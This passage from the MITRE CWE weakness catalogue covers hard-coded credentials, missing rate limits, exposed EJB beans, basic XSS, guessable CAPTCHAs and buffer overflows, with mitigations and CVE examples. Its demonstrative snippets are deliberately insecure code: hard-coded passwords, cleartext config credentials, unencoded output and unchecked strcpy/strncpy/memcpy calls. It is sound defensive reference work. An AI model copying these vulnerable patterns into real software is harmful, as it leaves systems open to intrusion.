file/database still requires the attacker to try to crack the password. When handling an incoming password during authentication, take the hash of the password and compare it to the saved hash. + Use randomly assigned salts for each separate hash that is generated. This increases the amount of computation that an attacker needs to conduct a brute-force attack, possibly limiting the effectiveness of the rainbow table method. + + + + Architecture and Design + + For front-end to back-end connections: Three solutions are possible, although none are complete. + + The first suggestion involves the use of generated passwords or keys that are changed automatically and must be entered at given time intervals by a system administrator. These passwords will be held in memory and only be valid for the time intervals. + Next, the passwords or keys should be limited at the back end to only performing actions valid for the front end, as opposed to having full access. + Finally, the messages sent should be tagged and checksummed with time sensitive values so as to prevent replay-style attacks. + + + + + + + The following code uses a hard-coded password to connect to a database: + + ...DriverManager.getConnection(url, "scott", "tiger");... + + This is an example of an external hard-coded password on the client-side of a connection. This code will run successfully, but anyone who has access to it will have access to the password. Once the program has shipped, there is no going back from the database user "scott" with a password of "tiger" unless the program is patched. A devious employee with access to this information can use it to break into the system. Even worse, if attackers have access to the bytecode for application, they can use the javap -c command to access the disassembled code, which will contain the values of the passwords used. The result of this operation might look something like the following for the example above: + + javap -c ConnMngr.class22: ldc #36; //String jdbc:mysql://ixne.com/rxsql24: ldc #38; //String scott26: ldc #17; //String tiger + + + + + The following code is an example of an internal hard-coded password in the back-end: + + int VerifyAdmin(char *password) { + if (strcmp(password, "Mew!")) { + + printf("Incorrect Password!\n");return(0) + }printf("Entering Diagnostic Mode...\n");return(1); + } + + + int VerifyAdmin(String password) {if (!password.equals("Mew!")) {return(0)}//Diagnostic Modereturn(1);} + + Every instance of this program can be placed into diagnostic mode with the same password. Even worse is the fact that if this program is distributed as a binary-only distribution, it is very difficult to change that password or disable this "functionality." + + + The following code examples attempt to verify a password using a hard-coded cryptographic key. + + int VerifyAdmin(char *password) { + if (strcmp(password,"68af404b513073584c4b6f22b6c63e6b")) { + + printf("Incorrect Password!\n");return(0); + }printf("Entering Diagnostic Mode...\n");return(1); + } + + + public boolean VerifyAdmin(String password) {if (password.equals("68af404b513073584c4b6f22b6c63e6b")) {System.out.println("Entering Diagnostic Mode...");return true;}System.out.println("Incorrect Password!");return false; + + + + int VerifyAdmin(String password) {if (password.Equals("68af404b513073584c4b6f22b6c63e6b")) {Console.WriteLine("Entering Diagnostic Mode...");return(1);}Console.WriteLine("Incorrect Password!");return(0);} + + The cryptographic key is within a hard-coded string value that is compared to the password. It is likely that an attacker will be able to read the key and compromise the system. + + + The following examples show a portion of properties and configuration files for Java and ASP.NET applications. The files include username and password information but they are stored in cleartext. + This Java example shows a properties file with a cleartext username / password pair. + + + + # Java Web App ResourceBundle properties file + ...webapp.ldap.username=secretUsernamewebapp.ldap.password=secretPassword... + + The following example shows a portion of a configuration file for an ASP.Net application. This configuration file includes username and password information for a connection to a database but the pair is stored in cleartext. + + ...<connectionStrings><add name="ud_DEV" connectionString="connectDB=uDB; uid=db2admin; pwd=password; dbalias=uDB;" providerName="System.Data.Odbc" /></connectionStrings>... + + Username and password information should not be included in a configuration file or a properties file in cleartext as this will allow anyone who can read the file access to the resource. If possible, encrypt this information. + + + In 2022, the OT:ICEFALL study examined products by 10 different Operational Technology (OT) vendors. The researchers reported 56 vulnerabilities and said that the products were "insecure by design" [REF-1283]. If exploited, these vulnerabilities often allowed adversaries to change how the products operated, ranging from denial of service to changing the code that the products executed. Since these products were often used in industries such as power, electrical, water, and others, there could even be safety implications. + Multiple vendors used hard-coded credentials in their OT products. + + + + + CVE-2022-29953 + Condition Monitor firmware has a maintenance interface with hard-coded credentials + https://www.cve.org/CVERecord?id=CVE-2022-29953 + + + CVE-2022-29960 + Engineering Workstation uses hard-coded cryptographic keys that could allow for unathorized filesystem access and privilege escalation + https://www.cve.org/CVERecord?id=CVE-2022-29960 + + + CVE-2022-29964 + Distributed Control System (DCS) has hard-coded passwords for local shell access + https://www.cve.org/CVERecord?id=CVE-2022-29964 + + + CVE-2022-30997 + Programmable Logic Controller (PLC) has a maintenance service that uses undocumented, hard-coded credentials + https://www.cve.org/CVERecord?id=CVE-2022-30997 + + + CVE-2022-30314 + Firmware for a Safety Instrumented System (SIS) has hard-coded credentials for access to boot configuration + https://www.cve.org/CVERecord?id=CVE-2022-30314 + + + CVE-2022-30271 + Remote Terminal Unit (RTU) uses a hard-coded SSH private key that is likely to be used in typical deployments + https://www.cve.org/CVERecord?id=CVE-2022-30271 + + + CVE-2021-37555 + Telnet service for IoT feeder for dogs and cats has hard-coded password [REF-1288] + https://www.cve.org/CVERecord?id=CVE-2021-37555 + + + CVE-2012-3503 + Installation script has a hard-coded secret token value, allowing attackers to bypass authentication + https://www.cve.org/CVERecord?id=CVE-2012-3503 + + + CVE-2010-2772 + SCADA system uses a hard-coded password to protect back-end database containing authorization information, exploited by Stuxnet worm + https://www.cve.org/CVERecord?id=CVE-2010-2772 + + + CVE-2010-2073 + FTP server library uses hard-coded usernames and passwords for three default accounts + https://www.cve.org/CVERecord?id=CVE-2010-2073 + + + CVE-2010-1573 + Chain: Router firmware uses hard-coded username and password for access to debug functionality, which can be used to execute arbitrary code + https://www.cve.org/CVERecord?id=CVE-2010-1573 + + + CVE-2008-2369 + Server uses hard-coded authentication key + https://www.cve.org/CVERecord?id=CVE-2008-2369 + + + CVE-2008-0961 + Backup product uses hard-coded username and password, allowing attackers to bypass authentication via the RPC interface + https://www.cve.org/CVERecord?id=CVE-2008-0961 + + + CVE-2008-1160 + Security appliance uses hard-coded password allowing attackers to gain root access + https://www.cve.org/CVERecord?id=CVE-2008-1160 + + + CVE-2006-7142 + Drive encryption product stores hard-coded cryptographic keys for encrypted configuration files in executable programs + https://www.cve.org/CVERecord?id=CVE-2006-7142 + + + CVE-2005-3716 + VoIP product uses hard-coded public credentials that cannot be changed, which allows attackers to obtain sensitive information + https://www.cve.org/CVERecord?id=CVE-2005-3716 + + + CVE-2005-3803 + VoIP product uses hard coded public and private SNMP community strings that cannot be changed, which allows remote attackers to obtain sensitive information + https://www.cve.org/CVERecord?id=CVE-2005-3803 + + + CVE-2005-0496 + Backup product contains hard-coded credentials that effectively serve as a back door, which allows remote attackers to access the file system + https://www.cve.org/CVERecord?id=CVE-2005-0496 + + + + + MSC03-J + Never hard code sensitive information + + + ASCSM-CWE-798 + + + Part 3-3 + Req SR 1.5 + + + Part 4-2 + Req CR 1.5 + + + + + + + + + + + + + + + + + Allowed + This CWE entry is at the Base level of abstraction, which is a preferred level of abstraction for mapping to the root causes of vulnerabilities. + Carefully read both the name and description to ensure that this mapping is an appropriate fit. Do not try to 'force' a mapping to a lower-level Base/Variant simply to comply with this preferred level of abstraction. + + + + + + The Taxonomy_Mappings to ISA/IEC 62443 were added in CWE 4.10, but they are still under review and might change in future CWE versions. These draft mappings were performed by members of the "Mapping CWE to 62443" subgroup of the CWE-CAPEC ICS/OT Special Interest Group (SIG), and their work is incomplete as of CWE 4.10. The mappings are included to facilitate discussion and review by the broader ICS/OT community, and they are likely to change in future CWE versions. + + + + CWE Content Team + MITRE + 2010-01-15 + 1.8 + 2010-02-16 + More abstract entry for hard-coded password and hard-coded cryptographic key. + + + CWE Content Team + MITRE + 2010-04-05 + updated Related_Attack_Patterns + + + CWE Content Team + MITRE + 2010-06-21 + updated Common_Consequences, References + + + CWE Content Team + MITRE + 2010-09-27 + updated Potential_Mitigations + + + CWE Content Team + MITRE + 2010-12-13 + updated Description + + + CWE Content Team + MITRE + 2011-06-01 + updated Common_Consequences, Relationships, Taxonomy_Mappings + + + CWE Content Team + MITRE + 2011-06-27 + updated Observed_Examples, Relationships + + + CWE Content Team + MITRE + 2011-09-13 + updated Potential_Mitigations, Relationships + + + CWE Content Team + MITRE + 2012-05-11 + updated Demonstrative_Examples, Related_Attack_Patterns, Relationships, Taxonomy_Mappings + + + CWE Content Team + MITRE + 2012-10-30 + updated Demonstrative_Examples, Potential_Mitigations + + + CWE Content Team + MITRE + 2013-02-21 + updated Applicable_Platforms, References + + + CWE Content Team + MITRE + 2014-07-30 + updated Demonstrative_Examples, Detection_Factors + + + CWE Content Team + MITRE + 2015-12-07 + updated Relationships + + + CWE Content Team + MITRE + 2017-01-19 + updated Related_Attack_Patterns + + + CWE Content Team + MITRE + 2017-11-08 + updated Causal_Nature, Demonstrative_Examples, Likelihood_of_Exploit, Modes_of_Introduction, References, Relationships + + + CWE Content Team + MITRE + 2018-03-27 + updated References + + + CWE Content Team + MITRE + 2019-01-03 + updated References, Relationships, Taxonomy_Mappings + + + CWE Content Team + MITRE + 2019-06-20 + updated Related_Attack_Patterns, Relationships + + + CWE Content Team + MITRE + 2019-09-19 + updated Relationships + + + CWE Content Team + MITRE + 2020-02-24 + updated Applicable_Platforms, Relationships + + + CWE Content Team + MITRE + 2020-08-20 + updated Relationships + + + CWE Content Team + MITRE + 2020-12-10 + updated Relationships + + + CWE Content Team + MITRE + 2021-03-15 + updated Demonstrative_Examples + + + CWE Content Team + MITRE + 2021-07-20 + updated Relationships + + + CWE Content Team + MITRE + 2021-10-28 + updated Relationships + + + CWE Content Team + MITRE + 2022-06-28 + updated Relationships + + + CWE Content Team + MITRE + 2022-10-13 + updated Applicable_Platforms, Demonstrative_Examples, Observed_Examples, References, Relationships + + + CWE Content Team + MITRE + 2023-01-31 + updated Description, Detection_Factors, Maintenance_Notes, Potential_Mitigations, Taxonomy_Mappings + + + CWE Content Team + MITRE + 2023-04-27 + updated References, Relationships + + + CWE Content Team + MITRE + 2023-06-29 + updated Mapping_Notes, Relationships + + + "Mapping CWE to 62443" Sub-Working Group + CWE-CAPEC ICS/OT SIG + 2023-01-24 + 4.10 + 2023-01-31 + Suggested mappings to ISA/IEC 62443. + + + + + The product does not properly limit the number or frequency of interactions that it has with an actor, such as the number of incoming requests. + This can allow the actor to perform actions more frequently than expected. The actor could be a human or an automated process such as a virus or bot. This could be used to cause a denial of service, compromise program logic (such as limiting humans to a single vote), or other consequences. For example, an authentication routine might not limit the number of times an attacker can guess a password. Or, a web site might conduct a poll but only expect humans to vote a maximum of once a day. + + + + + + Primary + + + + + + + + Insufficient anti-automation + The term "insufficient anti-automation" focuses primarly on non-human actors such as viruses or bots, but the scope of this CWE entry is broader. + + + Brute force + Vulnerabilities that can be targeted using brute force attacks are often symptomatic of this weakness. + + + + + Architecture and Design + + + Implementation + + + Operation + + + + + Availability + Access Control + Other + DoS: Resource Consumption (Other) + Bypass Protection Mechanism + Other + + + + + In the following code a username and password is read from a socket and an attempt is made to authenticate the username and password. The code will continuously checked the socket for a username and password until it has been authenticated. + + char username[USERNAME_SIZE];char password[PASSWORD_SIZE]; + while (isValidUser == 0) { + if (getNextMessage(socket, username, USERNAME_SIZE) > 0) {if (getNextMessage(socket, password, PASSWORD_SIZE) > 0) {isValidUser = AuthenticateUser(username, password);}} + }return(SUCCESS); + + This code does not place any restriction on the number of authentication attempts made. There should be a limit on the number of authentication attempts made to prevent brute force attacks as in the following example code. + + int count = 0;while ((isValidUser == 0) && (count < MAX_ATTEMPTS)) { + if (getNextMessage(socket, username, USERNAME_SIZE) > 0) {if (getNextMessage(socket, password, PASSWORD_SIZE) > 0) {isValidUser = AuthenticateUser(username, password);}}count++; + }if (isValidUser) {return(SUCCESS);}else {return(FAIL);} + + + + + + CVE-2002-1876 + Mail server allows attackers to prevent other users from accessing mail by sending large number of rapid requests. + https://www.cve.org/CVERecord?id=CVE-2002-1876 + + + + + 21 + Insufficient Anti-Automation + + + + + + + Allowed-with-Review + This CWE entry is a Class and might have Base-level children that would be more appropriate + Examine children of this entry to see if there is a better fit + + + + + + + CWE Content Team + MITRE + 2010-01-15 + 1.8 + 2010-02-16 + New entry to handle anti-automation as identified in WASC. + + + CWE Content Team + MITRE + 2010-04-05 + updated Demonstrative_Examples + + + CWE Content Team + MITRE + 2011-03-29 + updated Observed_Examples, Relationships + + + CWE Content Team + MITRE + 2011-06-01 + updated Common_Consequences + + + CWE Content Team + MITRE + 2017-11-08 + updated Demonstrative_Examples + + + CWE Content Team + MITRE + 2020-02-24 + updated Relationships + + + CWE Content Team + MITRE + 2021-10-28 + updated Relationships + + + CWE Content Team + MITRE + 2023-01-31 + updated Description + + + CWE Content Team + MITRE + 2023-04-27 + updated Relationships + + + CWE Content Team + MITRE + 2023-06-29 + updated Mapping_Notes + + + + + When an application exposes a remote interface for an entity bean, it might also expose methods that get or set the bean's data. These methods could be leveraged to read sensitive information, or to change data in ways that violate the application's expectations, potentially leading to other vulnerabilities. + + + + + + Architecture and Design + + + Implementation + + + + + Confidentiality + Integrity + Read Application Data + Modify Application Data + + + + + Implementation + Declare Java beans "local" when possible. When a bean must be remotely accessible, make sure that sensitive information is not exposed, and ensure that the application logic performs appropriate validation of any data that might be modified by an attacker. + + + + + The following example demonstrates the weakness. + + <ejb-jar><enterprise-beans><entity><ejb-name>EmployeeRecord</ejb-name><home>com.wombat.empl.EmployeeRecordHome</home><remote>com.wombat.empl.EmployeeRecord</remote>...</entity>...</enterprise-beans></ejb-jar> + + + + + + J2EE Misconfiguration: Unsafe Bean Declaration + + + SFP23 + Exposed Data + + + + + + + Allowed + This CWE entry is at the Variant level of abstraction, which is a preferred level of abstraction for mapping to the root causes of vulnerabilities. + Carefully read both the name and description to ensure that this mapping is an appropriate fit. Do not try to 'force' a mapping to a lower-level Base/Variant simply to comply with this preferred level of abstraction. + + + + + + Entity beans that expose a remote interface become part of an application's attack surface. For performance reasons, an application should rarely use remote entity beans, so there is a good chance that a remote entity bean declaration is an error. + + + + 7 Pernicious Kingdoms + 2006-07-19 + Draft 3 + 2006-07-19 + + + Eric Dalci + Cigital + 2008-07-01 + updated Time_of_Introduction + + + CWE Content Team + MITRE + 2008-09-08 + updated Relationships, Other_Notes, Taxonomy_Mappings + + + CWE Content Team + MITRE + 2009-07-27 + updated Demonstrative_Examples + + + CWE Content Team + MITRE + 2011-06-01 + updated Common_Consequences + + + CWE Content Team + MITRE + 2012-05-11 + updated Relationships + + + CWE Content Team + MITRE + 2012-10-30 + updated Potential_Mitigations + + + CWE Content Team + MITRE + 2014-07-30 + updated Relationships, Taxonomy_Mappings + + + CWE Content Team + MITRE + 2017-11-08 + updated Demonstrative_Examples + + + CWE Content Team + MITRE + 2020-02-24 + updated References, Relationships + + + CWE Content Team + MITRE + 2023-04-27 + updated Relationships + + + CWE Content Team + MITRE + 2023-06-29 + updated Mapping_Notes + + + + + The product receives input from an upstream component, but it does not neutralize or incorrectly neutralizes special characters such as "<", ">", and "&" that could be interpreted as web-scripting elements when they are sent to a downstream component that processes web pages. + This may allow such characters to be treated as control characters, which are executed client-side in the context of the user's session. Although this can be classified as an injection problem, the more pertinent issue is the improper conversion of such special characters to respective context-appropriate entities before displaying them to the user. + + + + + + Primary + + + + + + + + Implementation + + + High + + + Confidentiality + Integrity + Availability + Read Application Data + Execute Unauthorized Code or Commands + + + + + Automated Static Analysis + Automated static analysis, commonly referred to as Static Application Security Testing (SAST), can find some instances of this weakness by analyzing source code (or binary/compiled code) without having to execute it. Typically, this is done by building a model of data flow and control flow, then searching for potentially-vulnerable patterns that connect "sources" (origins of input) with "sinks" (destinations where the data interacts with external components, a lower layer such as the OS, etc.) + High + + + + + Implementation + Carefully check each input parameter against a rigorous positive specification (allowlist) defining the specific characters and format allowed. All input should be neutralized, not just parameters that the user is supposed to specify, but all data in the request, including hidden fields, cookies, headers, the URL itself, and so forth. A common mistake that leads to continuing XSS vulnerabilities is to validate only fields that are expected to be redisplayed by the site. We often encounter data from the request that is reflected by the application server or the application that the development team did not anticipate. Also, a field that is not currently reflected may be used by a future developer. Therefore, validating ALL parts of the HTTP request is recommended. + + + Implementation + Output Encoding + + Use and specify an output encoding that can be handled by the downstream component that is reading the output. Common encodings include ISO-8859-1, UTF-7, and UTF-8. When an encoding is not specified, a downstream component may choose a different encoding, either by assuming a default encoding or automatically inferring which encoding is being used, which can be erroneous. When the encodings are inconsistent, the downstream component might treat some character or byte sequences as special, even if they are not special in the original encoding. Attackers might then be able to exploit this discrepancy and conduct injection attacks; they even might be able to bypass protection mechanisms that assume the original encoding is also being used by the downstream component. + The problem of inconsistent output encodings often arises in web pages. If an encoding is not specified in an HTTP header, web browsers often guess about which encoding is being used. This can open up the browser to subtle XSS attacks. + + + + Implementation + With Struts, write all data from form beans with the bean's filter attribute set to true. + + + Implementation + Attack Surface Reduction + To help mitigate XSS attacks against the user's session cookie, set the session cookie to be HttpOnly. In browsers that support the HttpOnly feature (such as more recent versions of Internet Explorer and Firefox), this attribute can prevent the user's session cookie from being accessible to malicious client-side scripts that use document.cookie. This is not a complete solution, since HttpOnly is not supported by all browsers. More importantly, XMLHTTPRequest and other powerful browser technologies provide read access to HTTP headers, including the Set-Cookie header in which the HttpOnly flag is set. + Defense in Depth + + + + + In the following example, a guestbook comment isn't properly encoded, filtered, or otherwise neutralized for script-related tags before being displayed in a client browser. + + <% for (Iterator i = guestbook.iterator(); i.hasNext(); ) {Entry e = (Entry) i.next(); %><p>Entry #<%= e.getId() %></p><p><%= e.getText() %></p><%} %> + + + + + + + CVE-2002-0938 + XSS in parameter in a link. + https://www.cve.org/CVERecord?id=CVE-2002-0938 + + + CVE-2002-1495 + XSS in web-based email product via attachment filenames. + https://www.cve.org/CVERecord?id=CVE-2002-1495 + + + CVE-2003-1136 + HTML injection in posted message. + https://www.cve.org/CVERecord?id=CVE-2003-1136 + + + CVE-2004-2171 + XSS not quoted in error page. + https://www.cve.org/CVERecord?id=CVE-2004-2171 + + + + + Basic XSS + + + SFP24 + Tainted input to command + + + + + + + + + + Allowed + This CWE entry is at the Variant level of abstraction, which is a preferred level of abstraction for mapping to the root causes of vulnerabilities. + Carefully read both the name and description to ensure that this mapping is an appropriate fit. Do not try to 'force' a mapping to a lower-level Base/Variant simply to comply with this preferred level of abstraction. + + + + + + + PLOVER + 2006-07-19 + Draft 3 + 2006-07-19 + + + Sean Eidemiller + Cigital + 2008-07-01 + added/updated demonstrative examples + + + Eric Dalci + Cigital + 2008-07-01 + updated Time_of_Introduction + + + KDM Analytics + 2008-08-01 + added/updated white box definitions + + + CWE Content Team + MITRE + 2008-09-08 + updated Relationships, Taxonomy_Mappings, Weakness_Ordinalities + + + CWE Content Team + MITRE + 2008-10-14 + updated Description + + + CWE Content Team + MITRE + 2009-05-27 + updated Demonstrative_Examples, Description, Name + + + KDM Analytics + 2009-07-17 + Improved the White_Box_Definition + + + CWE Content Team + MITRE + 2009-07-27 + updated White_Box_Definitions + + + CWE Content Team + MITRE + 2010-06-21 + updated Demonstrative_Examples, Description, Name, Potential_Mitigations + + + CWE Content Team + MITRE + 2011-03-29 + updated Description, Potential_Mitigations + + + CWE Content Team + MITRE + 2011-06-01 + updated Common_Consequences + + + CWE Content Team + MITRE + 2012-05-11 + updated Related_Attack_Patterns, Relationships + + + CWE Content Team + MITRE + 2012-10-30 + updated Potential_Mitigations + + + CWE Content Team + MITRE + 2014-07-30 + updated Relationships, Taxonomy_Mappings + + + CWE Content Team + MITRE + 2017-05-03 + updated Potential_Mitigations, Related_Attack_Patterns + + + CWE Content Team + MITRE + 2017-11-08 + updated Applicable_Platforms, Causal_Nature, Likelihood_of_Exploit, Relationships, White_Box_Definitions + + + CWE Content Team + MITRE + 2020-02-24 + updated Relationships + + + CWE Content Team + MITRE + 2020-06-25 + updated Potential_Mitigations + + + CWE Content Team + MITRE + 2021-10-28 + updated Relationships + + + CWE Content Team + MITRE + 2023-01-31 + updated Description + + + CWE Content Team + MITRE + 2023-04-27 + updated Detection_Factors, Relationships + + + CWE Content Team + MITRE + 2023-06-29 + updated Mapping_Notes + + Basic XSS + Failure to Sanitize Script-Related HTML Tags in a Web Page (Basic XSS) + Improper Sanitization of Script-Related HTML Tags in a Web Page (Basic XSS) + + + + The product uses a CAPTCHA challenge, but the challenge can be guessed or automatically recognized by a non-human actor. + + An automated attacker could bypass the intended protection of the CAPTCHA challenge and perform actions at a higher frequency than humanly possible, such as launching spam attacks. + There can be several different causes of a guessable CAPTCHA: + + An audio or visual image that does not have sufficient distortion from the unobfuscated source image. + A question is generated with a format that can be automatically recognized, such as a math question. + A question for which the number of possible answers is limited, such as birth years or favorite sports teams. + A general-knowledge or trivia question for which the answer can be accessed using a data base, such as country capitals or popular entertainers. + Other data associated with the CAPTCHA may provide hints about its contents, such as an image whose filename contains the word that is used in the CAPTCHA. + + + + + + + + + Primary + + + + + + + + + Architecture and Design + + + Implementation + + + + + Access Control + Other + Bypass Protection Mechanism + Other + When authorization, authentication, or another protection mechanism relies on CAPTCHA entities to ensure that only human actors can access certain functionality, then an automated attacker such as a bot may access the restricted functionality by guessing the CAPTCHA. + + + + + 21 + Insufficient Anti-Automation + + + + + + + Allowed + This CWE entry is at the Base level of abstraction, which is a preferred level of abstraction for mapping to the root causes of vulnerabilities. + Carefully read both the name and description to ensure that this mapping is an appropriate fit. Do not try to 'force' a mapping to a lower-level Base/Variant simply to comply with this preferred level of abstraction. + + + + + + + CWE Content Team + MITRE + 2010-01-15 + 1.8 + 2010-02-16 + New entry to handle anti-automation as identified in WASC. + + + CWE Content Team + MITRE + 2010-06-21 + updated Common_Consequences + + + CWE Content Team + MITRE + 2011-06-01 + updated Common_Consequences, Relationships + + + CWE Content Team + MITRE + 2017-11-08 + updated Applicable_Platforms, Likelihood_of_Exploit + + + CWE Content Team + MITRE + 2020-02-24 + updated Relationships + + + CWE Content Team + MITRE + 2022-10-13 + updated Description, Relationships + + + CWE Content Team + MITRE + 2023-01-31 + updated Description + + + CWE Content Team + MITRE + 2023-04-27 + updated Relationships + + + CWE Content Team + MITRE + 2023-06-29 + updated Mapping_Notes + + + + + The product uses a sequential operation to read or write a buffer, but it uses an incorrect length value that causes it to access memory that is outside of the bounds of the buffer. + When the length value exceeds the size of the destination, a buffer overflow could occur. + + + + + + + + Resultant + + + Primary + + + + + + + + + + Implementation + + + High + + + Integrity + Confidentiality + Availability + Read Memory + Modify Memory + Execute Unauthorized Code or Commands + Buffer overflows often can be used to execute arbitrary code, which is usually outside the scope of a program's implicit security policy. This can often be used to subvert any other security service. + + + Availability + Modify Memory + DoS: Crash, Exit, or Restart + DoS: Resource Consumption (CPU) + Buffer overflows generally lead to crashes. Other attacks leading to lack of availability are possible, including putting the program into an infinite loop. + + + + + Automated Static Analysis + + This weakness can often be detected using automated static analysis tools. Many modern tools use data flow analysis or constraint-based techniques to minimize the number of false positives. + Automated static analysis generally does not account for environmental considerations when reporting out-of-bounds memory operations. This can make it difficult for users to determine which warnings should be investigated first. For example, an analysis tool might report buffer overflows that originate from command line arguments in a program that is not expected to run with setuid or other special privileges. + + High + Detection techniques for buffer-related errors are more mature than for most other weakness types. + + + Automated Dynamic Analysis + This weakness can be detected using dynamic tools and techniques that interact with the product using large test suites with many diverse inputs, such as fuzz testing (fuzzing), robustness testing, and fault injection. The product's operation may slow down, but it should not become unstable, crash, or generate incorrect results. + Moderate + Without visibility into the code, black box methods may not be able to sufficiently distinguish this weakness from others, requiring manual methods to diagnose the underlying problem. + + + Manual Analysis + Manual analysis can be useful for finding this weakness, but it might not achieve desired code coverage within limited time constraints. This becomes difficult for weaknesses that must be considered for all inputs, since the attack surface can be too large. + + + + + Requirements + Language Selection + + Use a language that does not allow this weakness to occur or provides constructs that make this weakness easier to avoid. + For example, many languages that perform their own memory management, such as Java and Perl, are not subject to buffer overflows. Other languages, such as Ada and C#, typically provide overflow protection, but the protection can be disabled by the programmer. + Be wary that a language's interface to native code may still be subject to overflows, even if the language itself is theoretically safe. + + + + Architecture and Design + Libraries or Frameworks + + Use a vetted library or framework that does not allow this weakness to occur or provides constructs that make this weakness easier to avoid. + Examples include the Safe C String Library (SafeStr) by Messier and Viega [REF-57], and the Strsafe.h library from Microsoft [REF-56]. These libraries provide safer versions of overflow-prone string-handling functions. + + This is not a complete solution, since many buffer overflows are not related to strings. + + + Operation + Build and Compilation + Environment Hardening + + Use automatic buffer overflow detection mechanisms that are offered by certain compilers or compiler extensions. Examples include: the Microsoft Visual Studio /GS flag, Fedora/Red Hat FORTIFY_SOURCE GCC flag, StackGuard, and ProPolice, which provide various mechanisms including canary-based detection and range/index checking. + D3-SFCV (Stack Frame Canary Validation) from D3FEND [REF-1334] discusses canary-based detection in detail. + + + Defense in Depth + + This is not necessarily a complete solution, since these mechanisms only detect certain types of overflows. In addition, the result is still a denial of service, since the typical response is to exit the application. + + + + Implementation + + Consider adhering to the following rules when allocating and managing an application's memory: + + Double check that the buffer is as large as specified. + When using functions that accept a number of bytes to copy, such as strncpy(), be aware that if the destination buffer size is equal to the source buffer size, it may not NULL-terminate the string. + Check buffer boundaries if accessing the buffer in a loop and make sure there is no danger of writing past the allocated space. + If necessary, truncate all input strings to a reasonable length before passing them to the copy and concatenation functions. + + + + + Architecture and Design + For any security checks that are performed on the client side, ensure that these checks are duplicated on the server side, in order to avoid CWE-602. Attackers can bypass the client-side checks by modifying values after the checks have been performed, or by changing the client to remove the client-side checks entirely. Then, these modified values would be submitted to the server. + + + Operation + Build and Compilation + Environment Hardening + + Run or compile the software using features or extensions that randomly arrange the positions of a program's executable and libraries in memory. Because this makes the addresses unpredictable, it can prevent an attacker from reliably jumping to exploitable code. + Examples include Address Space Layout Randomization (ASLR) [REF-58] [REF-60] and Position-Independent Executables (PIE) [REF-64]. Imported modules may be similarly realigned if their default memory addresses conflict with other modules, in a process known as "rebasing" (for Windows) and "prelinking" (for Linux) [REF-1332] using randomly generated addresses. ASLR for libraries cannot be used in conjunction with prelink since it would require relocating the libraries at run-time, defeating the whole purpose of prelinking. + For more information on these techniques see D3-SAOR (Segment Address Offset Randomization) from D3FEND [REF-1335]. + + Defense in Depth + These techniques do not provide a complete solution. For instance, exploits frequently use a bug that discloses memory addresses in order to maximize reliability of code execution [REF-1337]. It has also been shown that a side-channel attack can bypass ASLR [REF-1333] + + + Operation + Environment Hardening + + Use a CPU and operating system that offers Data Execution Protection (using hardware NX or XD bits) or the equivalent techniques that simulate this feature in software, such as PaX [REF-60] [REF-61]. These techniques ensure that any instruction executed is exclusively at a memory address that is part of the code segment. + For more information on these techniques see D3-PSEP (Process Segment Execution Prevention) from D3FEND [REF-1336]. + + Defense in Depth + This is not a complete solution, since buffer overflows could be used to overwrite nearby variables to modify the software's state in dangerous ways. In addition, it cannot be used in cases in which self-modifying code is required. Finally, an attack could still cause a denial of service, since the typical response is to exit the application. + + + Architecture and Design + Operation + Environment Hardening + Run your code using the lowest privileges that are required to accomplish the necessary tasks [REF-76]. If possible, create isolated accounts with limited privileges that are only used for a single task. That way, a successful attack will not immediately give the attacker access to the rest of the product or its environment. For example, database applications rarely need to run as the database administrator, especially in day-to-day operations. + + + Architecture and Design + Operation + Sandbox or Jail + + Run the code in a "jail" or similar sandbox environment that enforces strict boundaries between the process and the operating system. This may effectively restrict which files can be accessed in a particular directory or which commands can be executed by the software. + OS-level examples include the Unix chroot jail, AppArmor, and SELinux. In general, managed code may provide some protection. For example, java.io.FilePermission in the Java SecurityManager allows the software to specify restrictions on file operations. + This may not be a feasible solution, and it only limits the impact to the operating system; the rest of the application may still be subject to compromise. + Be careful to avoid CWE-243 and other weaknesses related to jails. + + Limited + The effectiveness of this mitigation depends on the prevention capabilities of the specific sandbox or jail being used and might only help to reduce the scope of an attack, such as restricting the attacker to certain system calls or limiting the portion of the file system that can be accessed. + + + + + This example takes an IP address from a user, verifies that it is well formed and then looks up the hostname and copies it into a buffer. + + void host_lookup(char *user_supplied_addr){ + struct hostent *hp;in_addr_t *addr;char hostname[64];in_addr_t inet_addr(const char *cp); + + /*routine that ensures user_supplied_addr is in the right format for conversion */ + + validate_addr_form(user_supplied_addr);addr = inet_addr(user_supplied_addr);hp = gethostbyaddr( addr, sizeof(struct in_addr), AF_INET);strcpy(hostname, hp->h_name); + } + + This function allocates a buffer of 64 bytes to store the hostname under the assumption that the maximum length value of hostname is 64 bytes, however there is no guarantee that the hostname will not be larger than 64 bytes. If an attacker specifies an address which resolves to a very large hostname, then the function may overwrite sensitive data or even relinquish control flow to the attacker. + Note that this example also contains an unchecked return value (CWE-252) that can lead to a NULL pointer dereference (CWE-476). + + + In the following example, it is possible to request that memcpy move a much larger segment of memory than assumed: + + int returnChunkSize(void *) { + + + /* if chunk info is valid, return the size of usable memory, + + + * else, return -1 to indicate an error + + + */ + ... + }int main() {...memcpy(destBuf, srcBuf, (returnChunkSize(destBuf)-1));...} + + If returnChunkSize() happens to encounter an error it will return -1. Notice that the return value is not checked before the memcpy operation (CWE-252), so -1 can be passed as the size argument to memcpy() (CWE-805). Because memcpy() assumes that the value is unsigned, it will be interpreted as MAXINT-1 (CWE-195), and therefore will copy far more memory than is likely available to the destination buffer (CWE-787, CWE-788). + + + In the following example, the source character string is copied to the dest character string using the method strncpy. + + ...char source[21] = "the character string";char dest[12];strncpy(dest, source, sizeof(source)-1);... + + However, in the call to strncpy the source character string is used within the sizeof call to determine the number of characters to copy. This will create a buffer overflow as the size of the source character string is greater than the dest character string. The dest character string should be used within the sizeof call to ensure that the correct number of characters are copied, as shown below. + + ...char source[21] = "the character string";char dest[12];strncpy(dest, source, sizeof(dest)-1);... + + + + In this example, the method outputFilenameToLog outputs a filename to a log file. The method arguments include a pointer to a character string containing the file name and an integer for the number of characters in the string. The filename is copied to a buffer where the buffer size is set to a maximum size for inputs to the log file. The method then calls another method to save the contents of the buffer to the log file. + + #define LOG_INPUT_SIZE 40 + + // saves the file name to a log file + int outputFilenameToLog(char *filename, int length) { + int success; + + // buffer with size set to maximum size for input to log file + char buf[LOG_INPUT_SIZE]; + + // copy filename to buffer + strncpy(buf, filename, length); + + // save to log file + success = saveToLogFile(buf); + return success; + } + + However, in this case the string copy method, strncpy, mistakenly uses the length method argument to determine the number of characters to copy rather than using the size of the local character string, buf. This can lead to a buffer overflow if the number of characters contained in character string pointed to by filename is larger then the number of characters allowed for the local character string. The string copy method should use the buf character string within a 